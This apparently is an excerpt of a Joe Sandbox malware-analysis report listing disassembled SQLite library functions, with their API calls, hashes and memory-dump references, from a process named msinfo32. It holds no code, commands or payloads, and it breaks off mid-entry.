                                                                                                              • Opcode ID: 04579e10308cec9f9a3a563516830acfcaa1de9a83a266432941d15b052560ea
                                                                                                              • Instruction ID: d32c1bebadbb9c71d39ecbdfa15658580ca3b38af5c273b3990c34e53e859a86
                                                                                                              • Opcode Fuzzy Hash: 04579e10308cec9f9a3a563516830acfcaa1de9a83a266432941d15b052560ea
                                                                                                              • Instruction Fuzzy Hash: D86114B0A486499FCB04DFA9D48469DBBF1BF88318F24C92DE495AB364D735D841CF41
                                                                                                              Function 61E312F4 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 219COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E31392
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E313A8
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E313ED
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E31417
                                                                                                                • Part of subcall function 61E289E8: sqlite3_str_vappendf.SQLITE3 ref: 61E28A02
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3147A
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E31520
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E315C8
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E31600
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E31625
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E3165E
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3167E
                                                                                                              • sqlite3_str_reset.SQLITE3 ref: 61E3169A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_append$sqlite3_str_appendf$sqlite3_str_resetsqlite3_str_vappendf
                                                                                                              • String ID: d
                                                                                                              • API String ID: 4035452181-2564639436
                                                                                                              • Opcode ID: d045bff266ce65f65f7b95b9b0ffbeab17d99faf20ddc45404f14358918df34c
                                                                                                              • Instruction ID: 8ef33dd5c2fe289c89823d7672227664f857001aa4561b03b75e69b1d7de3477
                                                                                                              • Opcode Fuzzy Hash: d045bff266ce65f65f7b95b9b0ffbeab17d99faf20ddc45404f14358918df34c
                                                                                                              • Instruction Fuzzy Hash: 4FA116709093659FEB20CF98C890B99BBF1BF85308F25C99ED488AB251C774D985CF52
                                                                                                              Function 61E20E4D Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20E81
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20E9E
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20EC3
                                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E20F01
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F24
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F3B
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F58
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F7A
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E20F93
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_append$sqlite3_str_appendall
                                                                                                              • String ID: (,)?$<expr>$rowid
                                                                                                              • API String ID: 851024535-569625528
                                                                                                              • Opcode ID: 877aad7b0ab0e87341d100284a4318150091ee5b94f96f15d4347dbce3afcb7d
                                                                                                              • Instruction ID: 4cf6646e150358cc2e302149c6d5c28119036a8eb3aa6223349fea35e088ffff
                                                                                                              • Opcode Fuzzy Hash: 877aad7b0ab0e87341d100284a4318150091ee5b94f96f15d4347dbce3afcb7d
                                                                                                              • Instruction Fuzzy Hash: 724138B09497059FDB009F58C5F579EBBE1FB84358F21C82DE4988B390C77AD8818B82
                                                                                                              Function 61E3C023 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 98COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_error$sqlite3_value_bytes$sqlite3_db_configsqlite3_freesqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                                                                                              • String ID: out of memory
                                                                                                              • API String ID: 2048698484-2599737071
                                                                                                              • Opcode ID: ff42abd895fad69d755db7a969358d2ffecccd06fd6bdbb8dd3dd7eb43846d32
                                                                                                              • Instruction ID: a5c2c4db3f93e8d40c51225c59a66e24a7cb1649afad64e66997a79ef1bb295d
                                                                                                              • Opcode Fuzzy Hash: ff42abd895fad69d755db7a969358d2ffecccd06fd6bdbb8dd3dd7eb43846d32
                                                                                                              • Instruction Fuzzy Hash: 1D41D7B49097669BCB109F68C48465EBBF0BF89724F21CA1DE8A49B390D334D441CF42
                                                                                                              Function 61E3B6F4 Relevance: 18.4, APIs: 12, Instructions: 379COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                                                                                              • String ID:
                                                                                                              • API String ID: 3802728871-0
                                                                                                              • Opcode ID: 191db6603ffe1a60367700dd186a6e8e36bc68dc8bef97921a5741047babf1cd
                                                                                                              • Instruction ID: 7a7bce942458b3c38004078f3a5a24b75502cc29e88cd778c924325fb2f6d660
                                                                                                              • Opcode Fuzzy Hash: 191db6603ffe1a60367700dd186a6e8e36bc68dc8bef97921a5741047babf1cd
                                                                                                              • Instruction Fuzzy Hash: 83126D74D04729CFDB60DF68C984B8DBBF1BF88315F1085AAE899A7241E7349A85CF11
                                                                                                              Function 61E63033 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 212COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E28259: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E2829D
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E63073
                                                                                                              • sqlite3_prepare_v2.SQLITE3 ref: 61E630AE
                                                                                                              • sqlite3_step.SQLITE3 ref: 61E630E5
                                                                                                              • sqlite3_errmsg.SQLITE3 ref: 61E632AE
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E632ED
                                                                                                                • Part of subcall function 61E25225: sqlite3_log.SQLITE3 ref: 61E2524E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_mutex_leavesqlite3_prepare_v2sqlite3_step
                                                                                                              • String ID: d$d
                                                                                                              • API String ID: 2909166478-195624457
                                                                                                              • Opcode ID: ae114b03031086fffb197695af07c18c9801f1b39ea4c6aa68537030f1fd8784
                                                                                                              • Instruction ID: eed49135d479217e734fff9b53e378a9a980ca02413c9c59ef74dd59a0246b24
                                                                                                              • Opcode Fuzzy Hash: ae114b03031086fffb197695af07c18c9801f1b39ea4c6aa68537030f1fd8784
                                                                                                              • Instruction Fuzzy Hash: 38811C70A44249DBDB00DFE9C48479EBBF5AF89718F64C42EE86897340D778D845CB91
                                                                                                              Function 61E35A48 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 358stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strncmp
                                                                                                              • String ID: -$-$0$]$false$null$true$}
                                                                                                              • API String ID: 1114863663-1443276563
                                                                                                              • Opcode ID: 50bb00445f65cda45c1b2c4f4639e90f90b356f5c8958f1287420796bc2cbbf9
                                                                                                              • Instruction ID: c04a123919a35016347dd75afbb87d20923b75c8e0a00e01049f01834856e81d
                                                                                                              • Opcode Fuzzy Hash: 50bb00445f65cda45c1b2c4f4639e90f90b356f5c8958f1287420796bc2cbbf9
                                                                                                              • Instruction Fuzzy Hash: BCD1D770A0827A8EE715CFA9C494399BBF1AFCA31CF68C65AD0919B385D339D447CB11
                                                                                                              Function 61E33532 Relevance: 16.7, APIs: 11, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                                                                                              • String ID:
                                                                                                              • API String ID: 3428878466-0
                                                                                                              • Opcode ID: fe6494e6d8ed98ee2b1f61f0973afebe522055ffd6ad81ba5f2b1579d9393009
                                                                                                              • Instruction ID: 2f3ec3f6e137691abcf94ce4cde592ed2cb18cc8f19a215ea8a8e83e2020f562
                                                                                                              • Opcode Fuzzy Hash: fe6494e6d8ed98ee2b1f61f0973afebe522055ffd6ad81ba5f2b1579d9393009
                                                                                                              • Instruction Fuzzy Hash: 5881E4B5E042598FCB01DFA9D480A9DBBF1BF88324F24852AE855EB355E735E841CF50
                                                                                                              Function 61E3C5D9 Relevance: 16.7, APIs: 11, Instructions: 193COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E0A352: sqlite3_free.SQLITE3 ref: 61E0A361
                                                                                                                • Part of subcall function 61E0A352: sqlite3_free.SQLITE3 ref: 61E0A36C
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3C606
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3C619
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E3C62E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 3723316075-0
                                                                                                              • Opcode ID: 2854da0b75f21c9bb25846760877c026f8eb55732051456ca03b5aa2582b231c
                                                                                                              • Instruction ID: 2ffe35a60403694682be074067f522adf7917a1ddb5b097814a6810ad4a4910b
                                                                                                              • Opcode Fuzzy Hash: 2854da0b75f21c9bb25846760877c026f8eb55732051456ca03b5aa2582b231c
                                                                                                              • Instruction Fuzzy Hash: 86816CB4A042658FDB04DF79C48479ABBF0BF88318F25C46AD8598B365D738E841CF51
                                                                                                              Function 61E4C640 Relevance: 16.6, APIs: 11, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C653
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C65E
                                                                                                              • sqlite3_reset.SQLITE3 ref: 61E4C68D
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4C697
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4C6A8
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C6B0
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C6E1
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4C6EE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C6F9
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C70A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C715
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_finalize$sqlite3_logsqlite3_mutex_entersqlite3_reset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3265072988-0
                                                                                                              • Opcode ID: 918f1d5fcc2ed3141946f0bfc0111dfbf4f263aeada9f6e905b24409e27a2b98
                                                                                                              • Instruction ID: bbd227a7e25c7b822b687509d316af0af9533b1c0ae95f80fad99d6b85bf1eed
                                                                                                              • Opcode Fuzzy Hash: 918f1d5fcc2ed3141946f0bfc0111dfbf4f263aeada9f6e905b24409e27a2b98
                                                                                                              • Instruction Fuzzy Hash: C3312770304B429FD700AFA9D1C4659BBE0BF88758F61C86DC9858B714E734F8A9CB92
                                                                                                              Function 61E0C625 Relevance: 16.6, APIs: 11, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2313487548-0
                                                                                                              • Opcode ID: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                                              • Instruction ID: 33d95616677f911cfef8c4a721762760e74432c08dfc9d1c94395672f97c874b
                                                                                                              • Opcode Fuzzy Hash: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                                              • Instruction Fuzzy Hash: E3115B74644B418BCB40AF78C4C4819FBE4EF48755B52999EDC8A8B31EE738D8A1CB51
                                                                                                              Function 61E4B55D Relevance: 16.5, APIs: 11, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E4B2A7: sqlite3_blob_close.SQLITE3 ref: 61E4B2CA
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B586
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B591
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B59C
                                                                                                                • Part of subcall function 61E49B16: sqlite3_mutex_enter.SQLITE3 ref: 61E49B59
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5A7
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5B2
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5BD
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5C8
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5D3
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5DE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B5E9
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B5F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_finalize$sqlite3_freesqlite3_mutex_enter$sqlite3_blob_closesqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 4171551786-0
                                                                                                              • Opcode ID: 9cf284536f99f11bff8864a7e48b16ff0371950dbaf48308ee95d254741b62ba
                                                                                                              • Instruction ID: 1a35796eaa2a51063c373edc9e2275d65b24633dbf53c513e8407ff7a8c2c3bd
                                                                                                              • Opcode Fuzzy Hash: 9cf284536f99f11bff8864a7e48b16ff0371950dbaf48308ee95d254741b62ba
                                                                                                              • Instruction Fuzzy Hash: BE1166B4A08781CBCB04BF79D2C5918BBE4AF88388F61889CD8859B316E735E844CB45
                                                                                                              Function 61E4B56E Relevance: 16.5, APIs: 11, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E4B2A7: sqlite3_blob_close.SQLITE3 ref: 61E4B2CA
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B586
                                                                                                                • Part of subcall function 61E49B16: sqlite3_log.SQLITE3 ref: 61E49B3A
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B591
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B59C
                                                                                                                • Part of subcall function 61E49B16: sqlite3_mutex_enter.SQLITE3 ref: 61E49B59
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5A7
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5B2
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5BD
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5C8
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5D3
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4B5DE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B5E9
